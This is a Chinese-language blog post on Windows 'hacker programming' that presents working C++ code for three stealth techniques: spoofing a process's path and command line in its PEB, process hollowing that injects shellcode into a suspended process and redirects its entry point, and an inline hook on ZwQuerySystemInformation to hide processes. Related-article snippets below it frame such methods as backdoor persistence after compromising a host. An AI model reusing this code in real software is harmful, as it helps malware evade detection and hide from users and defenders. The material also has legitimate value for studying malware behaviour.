windows黑客编程技术之隐藏技术(进程伪装,傀儡进程,进程隐藏)

最新推荐文章于 2024-06-25 10:53:44 发布
最新推荐文章于 2024-06-25 10:53:44 发布
阅读量6.2k 收藏 41
点赞数 2
文章标签: windows c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44891742/article/details/125627482
版权

进程伪装:通过修改指定进程PEB中的路径和命令行信息实现伪装。
傀儡进程:通过进程挂起,替换内存数据再恢复执行,从而实现创建“傀儡进程”。
进程隐藏:通过HOOK函数ZwQuerySystemInfomation来实现进程隐藏。

1 进程伪装

实现原理

就是修改指定进程环境块中的进程路径ImagePathName以及命令行CommandLine信息,从而达到进程伪装的效果。所以,实现的关键在于进程环境块的获取。可以用ntdll.dll的导出函数NTQueryInfomationProcess来获取指定进程的PEB地址,然后调用ReadProcessMemory和WriteProcessMemory来读写目标进程。

编码实现

关键字:NtQueryInformationProcess,Read/WriteProcessMemory,PROCESS_BASIC_INFORMATION,PEB

// 修改指定进程的进程环境块PEB中的路径和命令行信息, 实现进程伪装
BOOL DisguiseProcess(DWORD dwProcessId, wchar_t *lpwszPath, wchar_t *lpwszCmd)
{
	// 打开进程获取句柄
	HANDLE hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
	if (NULL == hProcess)
	{
		ShowError("OpenProcess");
		return FALSE;
	}

	typedef_NtQueryInformationProcess NtQueryInformationProcess = NULL;
	PROCESS_BASIC_INFORMATION pbi = { 0 };
	PEB peb = { 0 };
	RTL_USER_PROCESS_PARAMETERS Param = { 0 };
	USHORT usCmdLen = 0;
	USHORT usPathLen = 0;
	// 需要通过 LoadLibrary、GetProcessAddress 从 ntdll.dll 中获取地址
	NtQueryInformationProcess = (typedef_NtQueryInformationProcess)::GetProcAddress(
		::LoadLibrary("ntdll.dll"), "NtQueryInformationProcess");
	if (NULL == NtQueryInformationProcess)
	{
		ShowError("GetProcAddress");
		return FALSE;
	}
	// 获取指定进程的基本信息
	NTSTATUS status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), NULL);
	if (!NT_SUCCESS(status))
	{
		ShowError("NtQueryInformationProcess");
		return FALSE;
	}

	/*
  	    注意在读写其他进程的时候,注意要使用ReadProcessMemory/WriteProcessMemory进行操作,
	    每个指针指向的内容都需要获取,因为指针只能指向本进程的地址空间,必须要读取到本进程空间。
	    要不然一直提示位置访问错误!
	*/
	// 获取指定进程进本信息结构中的PebBaseAddress
	::ReadProcessMemory(hProcess, pbi.PebBaseAddress, &peb, sizeof(peb), NULL);
	// 获取指定进程环境块结构中的ProcessParameters, 注意指针指向的是指定进程空间中
	::ReadProcessMemory(hProcess, peb.ProcessParameters, &Param, sizeof(Param), NULL);

	// 修改指定进程环境块PEB中命令行信息, 注意指针指向的是指定进程空间中
	usCmdLen = 2 + 2 * ::wcslen(lpwszCmd);
	::WriteProcessMemory(hProcess, Param.CommandLine.Buffer, lpwszCmd, usCmdLen, NULL);
	::WriteProcessMemory(hProcess, &Param.CommandLine.Length, &usCmdLen, sizeof(usCmdLen), NULL);
	// 修改指定进程环境块PEB中路径信息, 注意指针指向的是指定进程空间中
	usPathLen = 2 + 2 * ::wcslen(lpwszPath);
	::WriteProcessMemory(hProcess, Param.ImagePathName.Buffer, lpwszPath, usPathLen, NULL);
	::WriteProcessMemory(hProcess, &Param.ImagePathName.Length, &usPathLen, sizeof(usPathLen), NULL);

	return TRUE;
}

测试

修改前
在这里插入图片描述
修改后
在这里插入图片描述

傀儡进程

实现原理

傀儡进程的创建原理就是修改某一进程的内存数据,向内存中写入Shellcode代码,并修改该进程的执行流程,使其转而执行Shellcode代码。
关键点有二:
一是写入ShellCode数据的时机,二是更改执行流程的方法。当我们CreateProcess的时候,设置状态为CREATE_SUSPENDED,这样主线程会挂起,直到通过ResumeThread来回复线程方可继续执行。在这个时候我们可以通过SetThreadContext函数修改线程上下文中的EIP数据,改变程序运行顺序。

编码实现

关键字:Get/SetThreadContext,ResumeThread

// 创建进程并替换进程内存数据, 更改执行顺序
BOOL ReplaceProcess(char *pszFilePath, PVOID pReplaceData, DWORD dwReplaceDataSize, DWORD dwRunOffset)
{
	STARTUPINFO si = { 0 };
	PROCESS_INFORMATION pi = { 0 };
	CONTEXT threadContext = { 0 };
	BOOL bRet = FALSE;
	::RtlZeroMemory(&si, sizeof(si));
	::RtlZeroMemory(&pi, sizeof(pi));
	::RtlZeroMemory(&threadContext, sizeof(threadContext));
	si.cb = sizeof(si);
	// 创建进程并挂起主线程
	bRet = ::CreateProcess(pszFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
	if (FALSE == bRet)
	{
		ShowError("CreateProcess");
		return FALSE;
	}
	// 读取基址的方法: 此时context中的EBX是指向PEB的指针, 而在PEB偏移是8的位置存放 PEB_LDR_DATA 的地址
	// 我们可以根据 PEB_LDR_DATA 获取进程基址以及遍历进程链获取所有进程
//	DWORD dwProcessBaseAddr = 0;
//	::ReadProcessMemory(pi.hProcess, (LPVOID)(8 + threadContext.Ebx), &dwProcessBaseAddr, sizeof(dwProcessBaseAddr), NULL);

	// 在替换的进程中申请一块内存
	LPVOID lpDestBaseAddr = ::VirtualAllocEx(pi.hProcess, NULL, dwReplaceDataSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (NULL == lpDestBaseAddr)
	{
		ShowError("VirtualAllocEx");
		return FALSE;
	}
	// 写入替换的数据
	bRet = ::WriteProcessMemory(pi.hProcess, lpDestBaseAddr, pReplaceData, dwReplaceDataSize, NULL);
	if (FALSE == bRet)
	{
		ShowError("WriteProcessError");
		return FALSE;
	}
	// 获取线程上下文
	// 注意此处标志,一定要写!!!
	threadContext.ContextFlags = CONTEXT_FULL;
	bRet = ::GetThreadContext(pi.hThread, &threadContext);//64:Wow64GetThreadContext
	if (FALSE == bRet)
	{
		ShowError("GetThreadContext");
		return FALSE;
	}
	// 修改进程的PE文件的入口地址以及映像大小,先获取原来进程PE结构的加载基址
	threadContext.Eip = (DWORD)lpDestBaseAddr + dwRunOffset;
	// 设置挂起进程的线程上下文
	bRet = ::SetThreadContext(pi.hThread, &threadContext);//Wow64SetThreadContext
	if (FALSE == bRet)
	{
		ShowError("SetThreadContext");
		return FALSE;
	}
	// 恢复挂起的进程的线程
	::ResumeThread(pi.hThread);

	return TRUE;
}

测试

直接启动测试程序弹框:
在这里插入图片描述
用傀儡进程的形式启动,成功执行了shellcode代码。
在这里插入图片描述

进程隐藏

实现原理

通过HOOK WIN32API ZwQuerySystemInfomation来实现进程隐藏。遍历进程通常是通过CreateToolhelp32Snapshot等来实现的,通过逆向这些API可以发现,他们内部最终是通过调用ZwQuerySystemInfomation,所以只需要HOOKZwQuerySystemInfomation就行了。
在钩子函数中判断检索的信息是否是该进程信息,是则去掉,进而隐藏进程信息。
但是注意这个函数没导出,还是要手动去ntdll里面去获取。

INLINE HOOK技术介绍:
Inline hook的核心原理是在获取进程中指定API的地址后,修改该API函数入口地址的前几个字节数据,写入一个跳转指令,跳转到自定义的钩子函数执行。
注意区分32和64位系统,他们的指针长度是不一样的。所以32位系统需要更改函数前五字节数据,64位则是前12字节数据。

编码实现

void HookApi()
{
	// 获取 ntdll.dll 的加载基址, 若没有则返回
	HMODULE hDll = ::GetModuleHandle("ntdll.dll");
	if (NULL == hDll)
	{
		return;
	}
	// 获取 ZwQuerySystemInformation 函数地址
	typedef_ZwQuerySystemInformation ZwQuerySystemInformation = (typedef_ZwQuerySystemInformation)::GetProcAddress(hDll, "ZwQuerySystemInformation");
	if (NULL == ZwQuerySystemInformation)
	{
		return;
	}
	// 32 位下修改前 5 字节, 64 位下修改前 12 字节
#ifndef _WIN64
	// jmp New_ZwQuerySystemInformation
	// 机器码位:e9 _dwOffset(跳转偏移)
	//		addr1 --> jmp _dwNewAddress指令的下一条指令的地址,即eip的值
	//		addr2 --> 跳转地址的值,即_dwNewAddress的值
	//		跳转偏移 _dwOffset = addr2 - addr1
	BYTE pData[5] = { 0xe9, 0, 0, 0, 0};
	DWORD dwOffset = (DWORD)New_ZwQuerySystemInformation - (DWORD)ZwQuerySystemInformation - 5;
	::RtlCopyMemory(&pData[1], &dwOffset, sizeof(dwOffset));
	// 保存前 5 字节数据
	::RtlCopyMemory(g_OldData32, ZwQuerySystemInformation, sizeof(pData));
#else
	// mov rax,0x1122334455667788
	// jmp rax
	// 机器码是:
	//	48 b8 8877665544332211
	//	ff e0
	BYTE pData[12] = {0x48, 0xb8, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xe0};
	ULONGLONG ullOffset = (ULONGLONG)New_ZwQuerySystemInformation;
	::RtlCopyMemory(&pData[2], &ullOffset, sizeof(ullOffset));
	// 保存前 12 字节数据
	::RtlCopyMemory(g_OldData64, ZwQuerySystemInformation, sizeof(pData));
#endif
	// 设置页面的保护属性为 可读、可写、可执行
	DWORD dwOldProtect = 0;
	::VirtualProtect(ZwQuerySystemInformation, sizeof(pData), PAGE_EXECUTE_READWRITE, &dwOldProtect);
	// 修改
	::RtlCopyMemory(ZwQuerySystemInformation, pData, sizeof(pData));
	// 还原页面保护属性
	::VirtualProtect(ZwQuerySystemInformation, sizeof(pData), dwOldProtect, &dwOldProtect);

}
shalunZhou
关注
  • 2
    点赞
  • 41
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
隐藏windows进程
04-21
隐藏进程 隐藏进程 隐藏进程 隐藏进程 隐藏进程 隐藏进程 隐藏进程
进程隐藏技术
w_g3366的博客
08-28 7959
文章目录进程隐藏技术1.进程伪装2.傀儡进程3.进程隐藏4.DLL劫持 进程隐藏技术 进程伪装:通过修改指定进程PEB中的路径和命令行信息实现伪装傀儡进程:通过进程挂起,替换内存数据再恢复执行,从而实现创建傀儡进程 进程隐藏:通过HOOK函数ZwQuerySystemInfornation实现进程隐藏 DLL劫持:通过#pragma comment指令直接转发DLL导出函数或者通过LoadL...
攻击手段-进程伪装实现
最新发布
qq_43179054的博客
06-25 298
实现包括将本进程通过修改PEB伪装成explorer.exe,再通过com启动cmd.exe,绕过防护。
win10驱动级-隐藏进程稳定不蓝屏技术
hzw320的博客
11-18 3463
支持到了win10 64位系统 , 支持隐藏目标进程(32/64位程序进程),隐藏后,连各种ark驱动工具都看不见我们的驱动隐藏进程隐藏进程呢,在之前很久以前的我们的game-ec 驱动模块usb版里 32位驱动 就有这个功能了 ,基本上按月付费租千元价格的驱动里才有 支持win10 64位系统的驱动隐藏进程。一般学员都知道隐藏进程的作用,但是自从微软系统出了win10 64系统后,但市面上那些驱动隐藏进程的不蓝屏的很少,有的也价格也非常贵,虽然市面上有出现了win10的驱动隐藏进程的驱动,
进程隐藏的各种方法 以及分析比较以及实现链接
hnust_xiehonghao的专栏
04-08 1万+
一、最为古老的DLL注入方法。   虽说古老,但也经历了不少变动,最初的win9X的系统没有Psapi,没有进程快照,所以一般是三级跳。跳啊跳……NT下可以直接用OpenProcess打开进程(打不开的话,提权到Debug权限),利用LoadLibrary,并且申请远程地址空间,然后把DLL注入到目标EXE进程当中,可谓省时省力,这也是目前应用作为普遍的方法之一。
探秘 ProcessGhosting:一款强大的进程隐藏工具
gitblog_00037的博客
04-06 822
探秘 ProcessGhosting:一款强大的进程隐藏工具 项目地址:https://gitcode.com/knightswd/ProcessGhosting 项目简介 ProcessGhosting 是一个开源项目,主要设计用于在Windows操作系统中实现进程的隐蔽和伪装,以提升系统的安全性和隐私保护。项目由开发者 KnightSWD 创建并维护,其目标是提供一种安全、高效的方式,让用户的...
WIN下 修改,伪装进程路径。支持XP,WIN7 WIN764
08-25
代码完全远程。 可以在XP WIN7 WIN764 WIN2003 等操作系统上成功实现修改进程路径。 已经封装成类,使用及其方便。 部分代码: 头文件: #ifndef ModifyProcessPath_h__ #define ModifyProcessPath_h__ // 结构定义 typedef struct _PROCESS_BASIC_INFORMATION { DWORD ExitStatus; ULONG PebBaseAddress; ULONG AffinityMask; LONG BasePriority; ULONG UniqueProcessId; ULONG InheritedFromUniqueProcessId; } PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION; // API声明 typedef LONG (__stdcall *PZWQUERYINFORMATIONPROCESS) ( HANDLE ProcessHandle, ULONG ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength ); class CModifyProcessPath { public: CModifyProcessPath(); BOOL Create(); BOOL ModifyProcessPath(LPCTSTR szPath); BOOL CamouflageExplorerPath(); }; #endif // ModifyProcessPath_h__ CPP部分代码: #include "StdAfx.h" #include "ModifyProcessPath.h" namespace MODIFY_PROCESS { wchar_t m_szModulePath[MAX_PATH]; DWORD dwGetModuleFileNameWAddress; DWORD dwModuleBaseAddress; //E9 (目标地址-当前地址 - 5) #pragma pack(1) typedef struct _JMPCODE { BYTE bJmp; DWORD dwAddr; }JMPCODE,*LPJMPCODE; #pragma pack() DWORD WINAPI MGetModuleFileNameW(HMODULE hModule,wchar_t * lpFilename,DWORD nSize); }; using namespace MODIFY_PROCESS; // 为了不影响在进程内使用 GetModuleFileNameW ,故hook之,返回正确的路径。 DWORD WINAPI MODIFY_PROCESS::MGetModuleFileNameW(HMODULE hModule,wchar_t * lpFilename,DWORD nSize) { typedef DWORD(WINAPI *MGetModuleFileNameWT)(HMODULE,LPWCH,DWORD); MGetModuleFileNameWT pMGetModuleFileNameW; pMGetModuleFileNameW = (MGetModuleFileNameWT)dwGetModuleFileNameWAddress; if(hModule == NULL || hModule ==(HMODULE)MODIFY_PROCESS::dwModuleBaseAddress) { StringCbCopyW(lpFilename,nSize,m_szModulePath); return wcslen(m_szModulePath); } return pMGetModuleFileNameW(hModule,lpFilename,nSize); } CModifyProcessPath::CModifyProcessPath() { } BOOL CModifyProcessPath::Create() { ZeroMemory(MODIFY_PROCESS::m_szModulePath,sizeof(MODIFY_PROCESS::m_szModulePath)); MODIFY_PROCESS::dwGet
进程伪装详解
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
03-10 1594
当我们获取到一台主机的权限过后,拿到了自己想要搜集的信息,这时候我们就会留一个后门进行权限维持,权限维持的学问其实很深,今天就主要介绍其中一种比较简单的权限维持的方法 -- 进程伪装。我们知道在windows里面有很多系统进程,如。
利用Windows进程隐藏进行权限维持
Karka_的博客
12-31 1583
进程(Process)是计算机中的程序关于某数据集合上的一次运行活动,是系统进行资源分配和调度的基本单位,是结构的基础。在早期面向进程设计的计算机结构中,进程是程序的基本执行实体;在当代面向线程设计的计算机结构中,进程是线程的容器。程序是指令、数据及其组织形式的描述,进程是程序的实体。我们在计算机上的每个程序运行起来之后都可以被称作进程进程可以在任务管理器里面看见,如下所示。
windows黑客编程技术详解之启动技术
weixin_44891742的博客
06-21 1661
windows黑客编程之启动技术
windows黑客编程系列(一):运行单一实例
至臻求学,胸怀云月
03-09 5083
windows黑客编程系列一 由于课题需要,不得不转行windows PE文件的研究,需要接触windows黑客编程。 新建windows编程系列笔记,待课题结束,回归ELF。 使用codeblocks新建一个win32 GUI程序 打开codeblocks -> create a new project -> 选择win32 GUI project -> Go -> 选择...
windows进程隐藏工具
09-08
Windows操作系统中,进程隐藏工具是一种实用的软件,它的主要功能是帮助用户隐藏正在运行的特定进程,以防止他人查看或管理系统中的应用程序。这在某些情况下,如工作或学习环境中,用户可能希望暂时隐藏个人娱乐...
天狼进程隐藏工具1.2.7z
02-04
虽然进程隐藏工具可以为合法用户提供额外的安全层,但同样也为恶意软件提供了藏身之处。黑客可能会利用类似工具隐藏病毒、木马或其他恶意程序,使得普通用户和安全软件难以发现。因此,正确理解和使用这类工具至关...
HP.rar_The Hidden_隐藏进程
09-20
标题中的“HP.rar_The Hidden_隐藏进程”表明这是一个关于隐藏进程技术的资源包,主要针对Windows 2000、XP和2003操作系统。在这个压缩包中,我们可能会找到与如何在这些系统中隐藏进程相关的工具、教程或者说明文档...
hide_process_32位进程隐藏_
10-02
值得注意的是,进程隐藏技术虽然有其合法的应用场景,如安全软件的自我保护,但往往也被恶意软件和黑客工具滥用,用于躲避反病毒软件检测或进行非法活动。因此,在学习和使用这类技术时,应确保遵循合法和道德的原则...
网络和黑客windows编程
xzb237cc
01-17 143
网络和黑客windows编程 2011年04月18日   第一节 了解Windows机制Windows 是一个“基于事件的,消息驱动的”操作系统。   在Windows下执行一个程序,只要用户进行了影响窗口的动作(如改变窗口大小或移动、单击鼠标等)该动作就会触发一个相应的“事件” 系统每次检测到一个事件时,就会给程序发送一个“消息”,从而使程序可以处理该事件。   每个Windows 应...
黑客编程入门书籍推荐——《WINDOWS黑客编程技术详解》
热门推荐
demongwc的博客
07-24 2万+
WINDOWS黑客编程技术详解》一书由人民邮电出版社于2018年12月出版,作者甘迪文。书籍内容分为用户篇和内核篇两部分,详解WINDOWS系统下黑客编程的技术,按照技术难易梯度依次汇集于一本书内。涉及用户层下的Windows编程和内核层下的Rootkit编程。本书分为用户篇和内核篇两部分,用户篇包括11章,配套49个示例程序源码;内核篇包括7章,配套28个示例程序源码。本书介绍的每个技术都有...
【渗透测试】初探进程伪装
HBohan的博客
11-03 599
前言 当我们获取到一台主机的权限过后,拿到了自己想要搜集的信息,这时候我们就会留一个后门进行权限维持,权限维持的学问其实很深,今天就主要介绍其中一种比较简单的权限维持的方法 – 进程伪装。 我们知道在windows里面有很多系统进程,如winlogon.exe、explorer.exe、services.exe等等,这些exe都是Windows必须具有的exe,当缺失某些exe的时候,windows就不能够正常运行,所以我们如果想到实现进程伪装,最好的选择就是伪装成系统必备的exe,当我们进行进程伪装之后,
Windows黑客编程基础
zerray's
06-08 4397
俗话说:“万事开头难”,编程也不例外,初学者如何入门关键要有一份正确的理论作指导,下面的这篇文章虽不能说是至理名言,但我相信通过作者细腻的分析、讲解和引导,定能给初学者起到启蒙的作用。本文分上下两部分,本期注重于讲理论,更精彩的还在下期,请读者密切关注。 Windows黑客编程基础(上) 文/劲风 上面的题目带有“黑客”两个字,请大家别误会了,其实没有多少是讲黑客的,这完全是一篇菜鸟级的编程杂谈,
c++ 进程隐藏 进程保护
05-13
进程隐藏进程保护是计算机安全领域中的两个重要概念。 进程隐藏是指通过修改进程的名称、目录、文件关联和运行参数等信息,使得进程在系统中难以被发现和识别。这种技术通常用于恶意软件和黑客攻击中,旨在使攻击者的操作不被系统管理员或安全软件发现和干扰。进程隐藏有多种技术手段,如rootkit、代码注入、自删除等。 进程保护是指通过安全软件、安全设置、权限控制等方式,保护进程免受外部攻击和恶意软件的侵害。具体来说,进程保护包括对进程的数据和代码进行加密、签名和授权,防止非法篡改和恶意修改;对进程进行实时监测、追踪和记录,发现异常行为和攻击的迹象;对进程进行隔离、限制和控制,使其不能对系统和其他进程造成危害和威胁。 综上所述,进程隐藏进程保护是两个截然不同的概念,前者是攻击者利用的手段,后者是防御者采取的措施。在计算机安全与防御中,进程保护的优势和必要性远远大于进程隐藏,因为只有通过进程保护,才能真正从根本上保护计算机和数据的安全和稳定。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值